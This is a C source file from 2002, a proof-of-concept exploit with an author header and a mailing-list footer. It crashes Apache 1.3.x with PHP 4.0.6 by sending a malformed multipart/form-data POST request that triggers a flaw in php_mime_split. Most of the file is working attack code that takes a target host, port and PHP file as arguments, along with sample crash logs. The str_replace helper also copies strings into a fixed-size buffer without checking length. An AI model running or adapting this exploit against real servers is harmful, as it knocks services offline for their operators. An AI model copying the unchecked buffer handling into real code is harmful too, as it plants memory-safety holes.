/*

---------------------------------------------------------------------------

Web: http://qb0x.net Author: Gabriel A. Maggiotti

Date: Febrary 03, 2002 E-mail: gmaggiot@ciudad.com.ar

---------------------------------------------------------------------------

Summary

-------

This is a proof of concept exploit for Apache/1.3.x + php_4.0.6. This

code exploit multipart/form-data POST requests bug. This code only crash

apache deamon, not open any shell or execute code in the remote server.

PHP supports multipart/form-data POST requests (as described in RFC1867)

known as POST fileuploads. Unfourtunately there are several flaws in the

php_mime_split function that could be used by an attacker to execute arbi-

trary code. I dont know if the vuln I exploit is a known vuln or not.

Example:

-------

<quote>

[gabi@pluto logs]$ ./apache_php host 80 hi.php

[gabi@pluto logs]$ cat /www/logs/error_log

[Sun Mar 3 02:50:36 2002] [notice] child pid 26856 exit signal Segmentation

fault (11)

[gabi@pluto logs]$

</quote>

Greets:

------

A special greets to Fernando Oubi#a and Sebastian Brocher, good friend of

mime.

An very special greets for a good friend and an excellent Security

Consultant Alex Hernandez!!!

*/

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

#include <errno.h>

#include <string.h>

#include <netdb.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <sys/socket.h>

#include <sys/wait.h>

#include <unistd.h>

#include <fcntl.h>

#define MAX 1000

#define PORT 80

char *str_replace(char *rep, char *orig, char *string)

{

int len=strlen(orig);

char buf[MAX]="";

char *pt=strstr(string,orig);

strncpy(buf,string, pt-string );

strcat(buf,rep);

strcat(buf,pt+strlen(orig));

strcpy(string,buf);

return string;

}

int main(int argc,char *argv[MAX])

{

int sockfd;

int numbytes;

int port;

char *ptr;

char POST_REQUEST[MAX] =

"POST ##file HTTP/1.0\n"

"Referer: http://host/xxxxxx/exp.php?hi_lames=haha\n"

"Connection: Keep-Alive\nContent-type: multipart/for"

"m-data; boundary=---------------------------1354088"

"10612827886801697150081\nContent-Length: 567\n\n---"

"--------------------------1354088106128278868016971"

"50081\nContent-Disposition: form-data; name=\"\x8\"";

struct hostent *he;

struct sockaddr_in their_addr;

if(argc!=4)

{

fprintf(stderr,"usage:%s <hostname> <port> <php_file>\n",argv[0]);

exit(1);

}

port=atoi(argv[2]);

ptr=str_replace(argv[3],"##file",POST_REQUEST);

//ptr=POST_REQUEST;

if((he=gethostbyname(argv[1]))==NULL)

{

perror("gethostbyname");

exit(1);

}

if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {

perror("socket"); exit(1);

}

their_addr.sin_family=AF_INET;

their_addr.sin_port=htons(port);

their_addr.sin_addr=*((struct in_addr*)he->h_addr);

bzero(&(their_addr.sin_zero),8);

if( connect(sockfd,(struct sockaddr*)&their_addr,\

sizeof(struct sockaddr))==-1)

{

perror("connect");

exit(1);

}

if( send(sockfd,ptr,strlen(POST_REQUEST),0) ==-1)

{

perror("send");

exit(0);

}

close(sockfd);

return 0;

}

/*

---------------------------------------------------------------------------

research-list@qb0x.net is dedicated to interactively researching vulnerab-

ilities, report potential or undeveloped holes in any kind of computer system.

To subscribe to research-list@qb0x.ne t send a blank email to

research-list-subscribe@qb0x.net. More help available sending an email

to research-list-help@qb0x.net.

Note: the list doesn't allow html, it will be stripped from messages.

---------------------------------------------------------------------------

*/